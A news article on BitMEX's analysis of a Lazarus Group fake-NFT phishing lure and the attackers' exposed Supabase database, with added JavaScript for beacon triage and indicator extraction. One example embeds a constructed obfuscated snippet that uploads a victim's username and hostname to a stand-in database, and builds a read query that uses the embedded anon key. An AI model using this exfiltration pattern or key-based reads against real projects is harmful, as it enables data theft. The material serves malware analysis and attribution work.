BitMEX Developers Uncover Details About Lazarus Group Hackers After Accessing Their Database
BitMEX has published a detailed article on its blog outlining what it learned about North Korea’s Lazarus Group from a recent attempt on its crypto exchange. Lazarus Group is notorious for targeting the crypto sector, employing all sorts of tricks and tactics to steal funds from unsuspecting crypto holders.
The hackers have targeted various exchanges, including Phemex and Bybit. They also approached a BitMEX employee with a phony project, a pretext for a phishing attempt intended to install malicious software on the employee’s device. Now BitMEX is fighting back, taking a deep dive into the malicious code used by the group. In the process BitMEX uncovered serious operational security lapses on the attackers’ side, including an exposed tracking database and leaked origin IP addresses. From that data BitMEX could work out the group’s operating hours and single out individuals pivotal to its operations. BitMEX also identified different tiers of operator, with less experienced members assigned to phishing tasks and highly skilled members assigned to post-exploitation.
The BitMEX blog post also outlined measures for detecting compromises in real time, including an internal monitoring system that flags infected machines. The investigation began when a Lazarus Group member contacted a BitMEX employee on LinkedIn with an invitation to join a fake NFT project. Rather than ignoring the brazen phishing attempt, BitMEX decided to investigate. Because the attacker had sent a link to a Next.js / React project on GitHub, the team had a chance to analyse live Lazarus code, and it quickly found that the project was built to entice the target into running malicious code on their own machine.
BitMEX researchers located the Supabase database the malware reports to. For every machine that ran the code it recorded the username, hostname, operating system, geolocation, timestamp and IP address. From the frequency of check-ins BitMEX could tell which entries were the attackers’ own development or test machines rather than genuine victims. Most of those developers were using VPNs to obfuscate their location, but one slipped up at one stage and reported the machine’s real IP address, a China Mobile address geolocated to Jiaxing, China.
BitMEX considers this a major operational security failure that could reveal the hacker’s identity. The database also revealed which VPN services the hackers were using. BitMEX then wrote a script to analyse the database and search for such operational mistakes automatically; even hackers make mistakes, and they can be highly costly. BitMEX also found that Lazarus activity dropped between 8 am and 1 pm UTC, which is 5 pm to 10 pm Pyongyang time (UTC+9). Such a structured pattern suggests the attackers keep an organised work schedule.
According to the BitMEX developers, the operators have varying technical abilities and sit in a hierarchy. That detail can be exploited by looking for the mistakes the novices make. The developers noticed that one operator had attempted to reuse a program named ‘BeaverTail’ but implemented it incorrectly, nearly exposing a personal IP address. Categorising the database records first, separating genuine victims from the attackers’ own machines, is what allowed BitMEX to pick out the operational mistakes of the less skilled operators.
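The kind of triage the preceding three paragraphs describe, as an added example written for this article and not BitMEX’s own script. It takes beacon rows of the shape the article lists (username, hostname, OS, timestamp, IP), separates the operators’ own build and test machines from genuine victims by check-in frequency, flags beacons from those machines that arrive from a non-VPN address, and builds an hour-of-day histogram over the operators’ machines only to find their quiet window. The rows, IP addresses (RFC 5737 documentation ranges), organisation names and the check-in threshold are all constructed for the example, and the small lookup table stands in for a real GeoIP/ASN database.

```javascript
// Added example, not BitMEX's script. Triage of a malware beacon table of the
// shape described in the article. All rows, addresses and names are constructed.

// Stand-in for a GeoIP/ASN lookup (constructed; RFC 5737 documentation ranges).
const ASN_LOOKUP = {
  "192.0.2.10":    { org: "VPN provider A (constructed)", vpn: true,  city: "Amsterdam" },
  "192.0.2.11":    { org: "VPN provider A (constructed)", vpn: true,  city: "Amsterdam" },
  "192.0.2.20":    { org: "VPN provider B (constructed)", vpn: true,  city: "Tokyo" },
  "198.51.100.77": { org: "Mobile carrier (constructed)", vpn: false, city: "Jiaxing" },
  "203.0.113.5":   { org: "Consumer ISP (constructed)",   vpn: false, city: "Berlin" },
  "203.0.113.9":   { org: "Consumer ISP (constructed)",   vpn: false, city: "Lisbon" },
};

// Constructed beacon rows. Genuine victims run the lure once; the operators'
// own machines beacon every time they rebuild or test it.
const rows = [
  { username: "dev",   hostname: "BUILD-01", os: "win32",  ip: "192.0.2.10",    ts: "2025-05-01T02:10:00Z" },
  { username: "dev",   hostname: "BUILD-01", os: "win32",  ip: "192.0.2.11",    ts: "2025-05-01T05:30:00Z" },
  { username: "dev",   hostname: "BUILD-01", os: "win32",  ip: "192.0.2.10",    ts: "2025-05-01T07:45:00Z" },
  { username: "dev",   hostname: "BUILD-01", os: "win32",  ip: "198.51.100.77", ts: "2025-05-01T13:05:00Z" }, // the slip
  { username: "dev",   hostname: "BUILD-01", os: "win32",  ip: "192.0.2.10",    ts: "2025-05-02T15:20:00Z" },
  { username: "dev",   hostname: "BUILD-01", os: "win32",  ip: "192.0.2.11",    ts: "2025-05-02T18:00:00Z" },
  { username: "qa",    hostname: "TEST-02",  os: "darwin", ip: "192.0.2.20",    ts: "2025-05-01T22:15:00Z" },
  { username: "qa",    hostname: "TEST-02",  os: "darwin", ip: "192.0.2.20",    ts: "2025-05-01T23:40:00Z" },
  { username: "qa",    hostname: "TEST-02",  os: "darwin", ip: "192.0.2.20",    ts: "2025-05-02T00:05:00Z" },
  { username: "alice", hostname: "LAPTOP-A", os: "win32",  ip: "203.0.113.5",   ts: "2025-05-03T09:30:00Z" },
  { username: "bob",   hostname: "WS-B",     os: "linux",  ip: "203.0.113.9",   ts: "2025-05-04T11:10:00Z" },
];

function hostKey(r) { return `${r.username}@${r.hostname}`; }

// A host that checks in repeatedly is almost certainly the operators' own
// build/test machine. The threshold of 3 is an assumption for this example.
function classifyHosts(rows, minCheckins = 3) {
  const counts = new Map();
  for (const r of rows) counts.set(hostKey(r), (counts.get(hostKey(r)) || 0) + 1);
  const out = {};
  for (const [k, n] of counts) out[k] = n >= minCheckins ? "attacker-dev-or-test" : "victim";
  return out;
}

// For the attackers' own machines, any beacon from a non-VPN address is an
// operational slip worth a closer look. Addresses missing from the lookup are skipped.
function findIpSlips(rows, lookup = ASN_LOOKUP) {
  const cls = classifyHosts(rows);
  return rows
    .filter(r => cls[hostKey(r)] === "attacker-dev-or-test")
    .filter(r => lookup[r.ip] && !lookup[r.ip].vpn)
    .map(r => ({ host: hostKey(r), ip: r.ip, org: lookup[r.ip].org, city: lookup[r.ip].city, ts: r.ts }));
}

// Hour-of-day histogram (UTC) over the attackers' machines only, so that
// victim infections (which happen on the victims' schedule) do not pollute it.
function hourHistogram(rows) {
  const cls = classifyHosts(rows);
  const hist = new Array(24).fill(0);
  for (const r of rows) {
    if (cls[hostKey(r)] !== "attacker-dev-or-test") continue;
    hist[new Date(r.ts).getUTCHours()]++;
  }
  return hist;
}

// Longest run of zero-activity hours (with wrap-around at midnight), reported
// in UTC and shifted to the local offset; +9 is Pyongyang time.
function quietWindow(hist, offsetHours = 9) {
  let best = { start: 0, len: 0 };
  for (let start = 0; start < 24; start++) {
    let len = 0;
    while (len < 24 && hist[(start + len) % 24] === 0) len++;
    if (len > best.len) best = { start, len };
  }
  if (best.len === 0) return null;
  const endUtc = (best.start + best.len) % 24; // exclusive
  const local = h => (h + offsetHours) % 24;
  return { startUtc: best.start, endUtc, startLocal: local(best.start), endLocal: local(endUtc), hours: best.len };
}

console.log(classifyHosts(rows));
console.log(findIpSlips(rows));
console.log(quietWindow(hourHistogram(rows)));
```

On the constructed rows the quiet window comes out as 8 to 13 UTC, 17 to 22 local; the victim beacons at 09:30 and 11:10 UTC fall inside that window, which is why the histogram is computed over the operators’ machines alone.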
JavaScript deobfuscation was a large part of the work because the Lazarus Group relies heavily on obfuscated code. The BitMEX blog says the developers had a lot of fun unpicking it, since it let them apply various creative methods to locate the malicious parts. They used the tool Webcrack, whose symbol-renaming function replaces mangled JavaScript identifiers with human-readable names. The team had deobfuscated earlier Lazarus malware and was prepared for the task; having a reusable set of procedures let them work through it quickly. This time, however, the developers noticed a new function that connected to a Supabase database and uploaded details about the victim’s machine. Supabase lets a developer stand up a database on the fly and exposes its tables through an auto-generated API, with no API layer of their own to write. The catch is that the project URL and its public API key have to be embedded in the client code, and the BitMEX developers knew that programmers often leave such a database without row-level access restrictions, so anyone holding that key can read the table. That is what happened here: they could access the Supabase database and perform further analysis of the attackers.
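What the last few sentences amount to in practice, as an added example that is not code from the BitMEX blog or from the malware: pull the Supabase project URL, public key and target table out of a lightly obfuscated lure, read the claims the key carries, and write down (without sending) the PostgREST read that the same key would permit if the project has no row-level security policy. The sample source, the project ref `abcdefghijklmnopqrst`, the key, the table name `beacons` and the three string-decoding passes are all constructed for the example; the decoding passes are a stand-in for what a tool like Webcrack does far more thoroughly. Supabase anon keys really are JWTs whose payload names the project ref and the `anon` role, which is what the decoder relies on. Requires Node 16 or later for `base64url`.

```javascript
// Added example, not code from the BitMEX blog or from the malware. Extracts
// Supabase indicators from obfuscated JavaScript and decodes the embedded key.
// Everything below (sample source, project ref, key, table name) is constructed.

// Supabase anon keys are JWTs with a payload such as
// {"iss":"supabase","ref":"<project-ref>","role":"anon",...}. A constructed
// one is built here so the decoder can be demonstrated offline.
function b64url(obj) {
  return Buffer.from(JSON.stringify(obj)).toString("base64url"); // Node 16+
}
const SAMPLE_ANON_KEY = [
  b64url({ alg: "HS256", typ: "JWT" }),
  b64url({ iss: "supabase", ref: "abcdefghijklmnopqrst", role: "anon", iat: 1700000000, exp: 2000000000 }),
  "c2lnbmF0dXJl", // placeholder signature; a real key is signed with the project's JWT secret
].join(".");

// Constructed lure snippet in the style an obfuscator emits: hex-escaped
// strings, concatenation, and String.fromCharCode() for the table name.
const SAMPLE_SOURCE = [
  'const _0x1a2b = "\\x68\\x74\\x74\\x70\\x73\\x3a\\x2f\\x2f" + "abcdefghijklmnopqrst" + "\\x2e\\x73\\x75\\x70\\x61\\x62\\x61\\x73\\x65\\x2e\\x63\\x6f";',
  `const _0x3c4d = "${SAMPLE_ANON_KEY}";`,
  "const _0x5e6f = createClient(_0x1a2b, _0x3c4d);",
  "_0x5e6f.from(String.fromCharCode(98,101,97,99,111,110,115)).insert({ u: os.userInfo().username, h: os.hostname() });",
].join("\n");

// Three cheap passes that undo common string obfuscation (constructed; a real
// deobfuscator such as Webcrack handles far more than this).
function decodeHexEscapes(src) {
  return src.replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
}
function decodeFromCharCode(src) {
  return src.replace(/String\.fromCharCode\(\s*([\d\s,]+?)\s*\)/g, (_, list) =>
    JSON.stringify(String.fromCharCode(...list.split(",").map(n => parseInt(n, 10)))));
}
function joinConcats(src) {
  return src.replace(/"\s*\+\s*"/g, ""); // "a" + "b"  ->  "ab"
}
function deobfuscate(src) {
  return joinConcats(decodeFromCharCode(decodeHexEscapes(src)));
}

// Indicators an analyst wants from the lure: project URL(s), embedded JWT(s), table name(s).
function extractIndicators(src) {
  const code = deobfuscate(src);
  return {
    urls:   [...new Set(code.match(/https:\/\/[a-z0-9]+\.supabase\.co/g) || [])],
    keys:   [...new Set(code.match(/eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+/g) || [])],
    tables: [...code.matchAll(/\.from\(\s*"([^"]+)"\s*\)/g)].map(m => m[1]),
  };
}

// JWT payload is the second dot-separated segment, base64url without padding.
function decodeJwtPayload(token) {
  return JSON.parse(Buffer.from(token.split(".")[1], "base64url").toString("utf8"));
}

// The ref inside the key must match the project host in the URL; a mismatch
// means the key belongs to a different project (or is a decoy).
function keyMatchesProject(url, payload) {
  return new URL(url).hostname === `${payload.ref}.supabase.co`;
}

// Supabase serves every table through PostgREST at /rest/v1/<table>. The anon
// key that lets the malware INSERT also lets anyone SELECT unless the
// project's row-level security policies forbid it. This only builds the
// request for the analyst to review; nothing is sent.
function plannedReadQuery(url, key, table, limit = 100) {
  return {
    method: "GET",
    url: `${url}/rest/v1/${table}?select=*&limit=${limit}`,
    headers: { apikey: key, Authorization: `Bearer ${key}` },
  };
}

function demo() {
  const found = extractIndicators(SAMPLE_SOURCE);
  const claims = decodeJwtPayload(found.keys[0]);
  return {
    found,
    claims,
    keyBelongsToUrl: keyMatchesProject(found.urls[0], claims),
    readQuery: plannedReadQuery(found.urls[0], found.keys[0], found.tables[0]),
  };
}

console.log(JSON.stringify(demo(), null, 2));
```

The `exp` claim is worth reading too: anon keys are issued with multi-year lifetimes, so a key harvested from a lure stays usable for as long as the project exists and the owner does not rotate the JWT secret.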